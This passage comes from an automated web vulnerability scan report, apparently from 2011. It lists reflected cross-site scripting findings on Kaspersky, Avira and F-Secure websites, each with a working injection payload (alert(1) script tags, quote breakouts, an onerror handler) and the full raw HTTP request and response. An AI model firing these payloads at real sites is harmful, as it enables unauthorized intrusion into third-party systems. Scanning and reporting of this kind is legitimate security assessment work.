Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_52.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64217"-alert(1)-"8ecc3cd7366 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/js_injector_52.js64217"-alert(1)-"8ecc3cd7366?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:34:12 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387652"
Content-Type: text/html; charset=utf-8
Content-Length: 40454
Date: Sun, 23 Oct 2011 16:34:22 GMT
X-Varnish: 1652559462
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
ame = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js64217"-alert(1)-"8ecc3cd7366?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.94. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_52.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e47c7"><script>alert(1)</script>5c188c1380c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/js_injector_52.jse47c7"><script>alert(1)</script>5c188c1380c?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:33:39 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387619"
Content-Type: text/html; charset=utf-8
Content-Length: 37857
Date: Sun, 23 Oct 2011 16:33:52 GMT
X-Varnish: 1652557801
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.jse47c7"><script>alert(1)</script>5c188c1380c?3" />
...[SNIP]...

1.95. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_55.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae927"><script>alert(1)</script>779246731c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesae927"><script>alert(1)</script>779246731c/usa.kaspersky.com/files/js_injector_55.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:27:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387251"
Content-Type: text/html; charset=utf-8
Content-Length: 30994
Date: Sun, 23 Oct 2011 16:27:45 GMT
X-Varnish: 1652539868
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sitesae927"><script>alert(1)</script>779246731c/usa.kaspersky.com/files/js_injector_55.js?3" />
...[SNIP]...

1.96. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_55.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d764b"-alert(1)-"55c3a8e0f63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sitesd764b"-alert(1)-"55c3a8e0f63/usa.kaspersky.com/files/js_injector_55.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:28:16 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387296"
Content-Type: text/html; charset=utf-8
Content-Length: 30903
Date: Sun, 23 Oct 2011 16:28:17 GMT
X-Varnish: 1652542541
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sitesd764b"-alert(1)-"55c3a8e0f63/usa.kaspersky.com/files/js_injector_55.js?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.97. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_55.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5549"-alert(1)-"dfc0fbdc3e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.comd5549"-alert(1)-"dfc0fbdc3e7/files/js_injector_55.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:29:20 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387360"
Content-Type: text/html; charset=utf-8
Content-Length: 30903
Date: Sun, 23 Oct 2011 16:29:32 GMT
X-Varnish: 1652546305
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.comd5549"-alert(1)-"dfc0fbdc3e7/files/js_injector_55.js?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.98. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_55.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc447"><script>alert(1)</script>9d610eba500 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.comfc447"><script>alert(1)</script>9d610eba500/files/js_injector_55.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:29:01 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387341"
Content-Type: text/html; charset=utf-8
Content-Length: 31000
Date: Sun, 23 Oct 2011 16:29:06 GMT
X-Varnish: 1652544927
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.comfc447"><script>alert(1)</script>9d610eba500/files/js_injector_55.js?3" />
...[SNIP]...

1.99. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_55.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5008a"-alert(1)-"d11620010df was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files5008a"-alert(1)-"d11620010df/js_injector_55.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:32:38 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387558"
Content-Type: text/html; charset=utf-8
Content-Length: 30903
Date: Sun, 23 Oct 2011 16:32:47 GMT
X-Varnish: 1652554518
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files5008a"-alert(1)-"d11620010df/js_injector_55.js?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.100. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_55.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fca2"><script>alert(1)</script>17b8a824108 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files4fca2"><script>alert(1)</script>17b8a824108/js_injector_55.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:30:17 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387417"
Content-Type: text/html; charset=utf-8
Content-Length: 31000
Date: Sun, 23 Oct 2011 16:30:24 GMT
X-Varnish: 1652548871
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files4fca2"><script>alert(1)</script>17b8a824108/js_injector_55.js?3" />
...[SNIP]...

1.101. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_55.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a734a"-alert(1)-"c56d4663c51 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/js_injector_55.jsa734a"-alert(1)-"c56d4663c51?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:34:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387696"
Content-Type: text/html; charset=utf-8
Content-Length: 30903
Date: Sun, 23 Oct 2011 16:35:15 GMT
X-Varnish: 1652562352
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
ame = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.jsa734a"-alert(1)-"c56d4663c51?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.102. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_55.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2632f"><script>alert(1)</script>66b2a5d2de9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/js_injector_55.js2632f"><script>alert(1)</script>66b2a5d2de9?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:34:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387671"
Content-Type: text/html; charset=utf-8
Content-Length: 31000
Date: Sun, 23 Oct 2011 16:34:36 GMT
X-Varnish: 1652560789
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js2632f"><script>alert(1)</script>66b2a5d2de9?3" />
...[SNIP]...

1.103. http://www.avira.com/search/frontendSc/autocomplete [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.avira.com
Path:	/search/frontendSc/autocomplete

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 562de<script>alert(1)</script>23d8f12d546 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search562de<script>alert(1)</script>23d8f12d546/frontendSc/autocomplete?q=xss+sqli+httpi+xml+&limit=10&timestamp=1319387725943 HTTP/1.1
Host: www.avira.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.avira.com/en/avira-version2012-b2c?x-campaigns=Version2012&x-Version2012=s_web&x-s_web=consumer-overview_link_en&utm_source=direct_organic&utm_medium=banner_en&utm_content=consumer_overview_link_en&utm_campaign=Version2012&x-origin=web
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lo3ik4pdav5vuvd85tno2aufq2; language=en; country=US; passthrough=%7B%22x-campaigns%22%3A%22Version2012%22%2C%22x-Version2012%22%3A%22s_web%22%2C%22x-s_web%22%3A%22consumer-overview_link_en%22%2C%22x-origin%22%3A%22web%22%7D; __utma=1.490122956.1319387150.1319387150.1319387543.2; __utmb=1.1.10.1319387543; __utmc=1; __utmz=1.1319387543.2.2.utmcsr=direct_organic|utmccn=Version2012|utmcmd=banner_en|utmcct=consumer_overview_link_en

Response

HTTP/1.1 404 CHttpException
Server: nginx/1.0.6
Date: Sun, 23 Oct 2011 16:36:16 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 135

<h1>CHttpException</h1>
<p>Unable to resolve the request "search562de<script>alert(1)</script>23d8f12d546/frontendSc/autocomplete".</p>

1.104. http://www.avira.com/search/frontendSc/autocomplete [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.avira.com
Path:	/search/frontendSc/autocomplete

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1e901<script>alert(1)</script>37bf346d290 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/frontendSc1e901<script>alert(1)</script>37bf346d290/autocomplete?q=xss+sqli+httpi+xml+&limit=10&timestamp=1319387725943 HTTP/1.1
Host: www.avira.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.avira.com/en/avira-version2012-b2c?x-campaigns=Version2012&x-Version2012=s_web&x-s_web=consumer-overview_link_en&utm_source=direct_organic&utm_medium=banner_en&utm_content=consumer_overview_link_en&utm_campaign=Version2012&x-origin=web
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lo3ik4pdav5vuvd85tno2aufq2; language=en; country=US; passthrough=%7B%22x-campaigns%22%3A%22Version2012%22%2C%22x-Version2012%22%3A%22s_web%22%2C%22x-s_web%22%3A%22consumer-overview_link_en%22%2C%22x-origin%22%3A%22web%22%7D; __utma=1.490122956.1319387150.1319387150.1319387543.2; __utmb=1.1.10.1319387543; __utmc=1; __utmz=1.1319387543.2.2.utmcsr=direct_organic|utmccn=Version2012|utmcmd=banner_en|utmcct=consumer_overview_link_en

Response

HTTP/1.1 404 CHttpException
Server: nginx/1.0.6
Date: Sun, 23 Oct 2011 16:36:18 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 135

<h1>CHttpException</h1>
<p>Unable to resolve the request "search/frontendSc1e901<script>alert(1)</script>37bf346d290/autocomplete".</p>

1.105. http://www.avira.com/search/frontendSc/autocomplete [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.avira.com
Path:	/search/frontendSc/autocomplete

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3ff84<img%20src%3da%20onerror%3dalert(1)>6b7f0b34b86 was submitted in the REST URL parameter 3. This input was echoed as 3ff84<img src=a onerror=alert(1)>6b7f0b34b86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/frontendSc/autocomplete3ff84<img%20src%3da%20onerror%3dalert(1)>6b7f0b34b86?q=xss+sqli+httpi+xml+&limit=10&timestamp=1319387725943 HTTP/1.1
Host: www.avira.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.avira.com/en/avira-version2012-b2c?x-campaigns=Version2012&x-Version2012=s_web&x-s_web=consumer-overview_link_en&utm_source=direct_organic&utm_medium=banner_en&utm_content=consumer_overview_link_en&utm_campaign=Version2012&x-origin=web
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lo3ik4pdav5vuvd85tno2aufq2; language=en; country=US; passthrough=%7B%22x-campaigns%22%3A%22Version2012%22%2C%22x-Version2012%22%3A%22s_web%22%2C%22x-s_web%22%3A%22consumer-overview_link_en%22%2C%22x-origin%22%3A%22web%22%7D; __utma=1.490122956.1319387150.1319387150.1319387543.2; __utmb=1.1.10.1319387543; __utmc=1; __utmz=1.1319387543.2.2.utmcsr=direct_organic|utmccn=Version2012|utmcmd=banner_en|utmcct=consumer_overview_link_en

Response

HTTP/1.1 404 CHttpException
Server: nginx/1.0.6
Date: Sun, 23 Oct 2011 16:36:29 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 140

<h1>CHttpException</h1>
<p>The system is unable to find the requested action "autocomplete3ff84<img src=a onerror=alert(1)>6b7f0b34b86".</p>

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.f-secure.com
Path:	/en/web/home_global/news-info/product-news-offers/view/story/463302/F-Secure%20Internet%20Security%202012%20-%20Complete%20Protection%20for%20Your%20Computer%20and%20Online%20Life

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 91193-->0fa78608273 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/web/home_global/news-info/product-news-offers/view/story/463302/F-Secure%20Internet%20Security%202012%20-%20Complete%20Protection%20for%20Your%20Computer%20and%20Online%20Life?91193-->0fa78608273=1 HTTP/1.1
Host: www.f-secure.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.f-secure.com/en/web/home_global/news-info/product-news-offers/view/story/463302/F-Secure%20Internet%20Security%202012%20-%20Complete%20Protection%20for%20Your%20Computer%20and%20Online%20Life
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
